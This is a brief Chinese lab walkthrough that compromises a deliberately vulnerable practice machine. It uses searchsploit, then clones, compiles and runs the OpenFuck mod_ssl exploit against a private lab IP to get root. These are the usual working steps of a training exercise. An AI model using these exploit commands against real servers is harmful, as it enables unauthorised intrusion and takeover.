环境准备
靶机链接:百度网盘 请输入提取码
提取码:vdo6
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
探测目标靶机开放端口和服务情况
漏洞利用
1.查看网页
2.查找mod_ssl相关漏洞,进行编译,即可提权成功。
searchsploit mod_ssl
权限提升
1.这里也可以从github中下载相关项目!按照步骤走即可提权。
git clone https://github.com/heltonWernik/Openluck apt-get install libssl-dev cd Openluck gcc -o OpenFuck OpenFuck.c -lcrypto ./OpenFuck ./OpenFuck 0x6b 192.168.1.102 443 -c 50
2.下载完 进入Openluck目录,进行编译
3.查看用法
4.找到对应版本,填写参数
5.运行,成功提权,轻松拿下!!!
./OpenFuck 0x6b 192.168.1.102 443 -c 50